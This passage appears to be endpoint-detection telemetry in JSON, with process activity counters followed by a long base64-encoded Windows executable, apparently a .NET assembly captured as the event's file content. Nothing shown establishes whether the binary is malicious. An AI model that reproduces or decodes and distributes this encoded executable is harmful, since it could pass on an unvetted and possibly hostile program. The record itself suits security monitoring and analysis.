{\"modelChildProcess\": 1, \"osChildProcess\": 1, \"crossProcess\": 2, \"moduleLoad\": 237, \"fileCreation\": 1, \"fileDeletion\": 1, \"fileModification\": 32, \"exeModification\": 3, \"netConnOut\": 2, \"registryModification\": 3, \"crossProcessDupProcessHandle\": 2}}, \"excluded\": \"E_FALSE\", \"name\": \" \", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_TRUE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B21DD2505AAA5F2\"}}, \"counters\": {\"moduleLoad\": 224, \"fileCreation\": 3, \"fileDeletion\": 3, \"fileModification\": 33, \"netConnOut\": 3, \"registryModification\": 1, \"dnsLookups\": 1}}, \"targetFile\": {\"node\": {\"key\": {}}, \"creationTime\": {}, \"owner\": {}, \"hashes\": {}}, \"content\": \"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BioAABMwBgA3AAAAEwAAESiPAAAGLC8UfvYCAAQCGY0EAAABCgYWA4wtAAAbogYXBIwuAAAbogYYBYwvAAAbogYogwAABio6An72AgAEAxQohQAABipqKI8AAAYsEgJ+9gIABANvagAAChQohQAABio6FH73AgAEAgMohQAABio6FH73AgAEAhQohQAABipqKJAAAAYsEhR+9wIABAJvagAAChQohQAABio6An73AgAEAwQohQAABioAAAATMAYAJQAAABMAABEokAAABiwdFH73AgAEAheNBAAAAQoGFgOMLQAAG6IGKIMAAAYqAAAAEzAGAC4AAAATAAARKJAAAAYsJhR+9wIABAIYjQQAAAEKBhYDjC0AABuiBhcEjC4AABuiBiiDAAAGKgAAEzAGADcAAAATAAARKJAAAAYsLxR+9wIABAIZjQQAAAEKBhYDjC0AABuiBhcEjC4AABuiBhgFjC8AABuiBiiDAAAGKjoCfvcCAAQDFCiFAAAGKmookAAABiwSAn73AgAEA29qAAAKFCiFAAAGKjoUfvgCAAQCAyiFAAAGKjoUfvgCAAQCFCiFAAAGKmookQAABiwSFH74AgAEAm9qAAAKFCiFAAAGKjoCfvgCAAQDBCiFAAAGKgAAABMwBgAlAAAAEwAAESiRAAAGLB0UfvgCAAQCF40EAAABCgYWA4wtAAAbogYogwAABioAAAATMAYALgAAABMAABEokQAABiwmFH74AgAEAhiNBAAAAQoGFgOMLQAAG6IGFwSMLgAAG6IGKIMAAAYqAAATMAYANwAAABMAABEokQAABiwvFH74AgAEAhmNBAAAAQoGFgOMLQAAG6IGFwSMLgAAG6IGGAWMLwAAG6IGKIMAAAYqOgJ++AIABAMUKIUAAAYqaiiRAAAGLBICfvgCAAQDb2oAAAoUKIUAAAYqOhR++QIABAIDKIUAAAYqOhR++QIABAIUKIUAAAYqaiiSAAAGLBIUfvkCAAQCb2oAAAoUKIUAAAYqOgJ++QIABAMEKIUAAAYqAAAAEzAGACUAAAATAAARKJIAAAYsHRR++QIABAIXjQQAAAEKBhYDjC0AABuiBiiDAAAGKgAAABMwBgAuAAAAEwAAESiSAAAGLCYUfvkCAAQCGI0EAAABCgYWA4wtAAAbogYXBIwuAAAbogYogwAABioAABMwBgA3AAAA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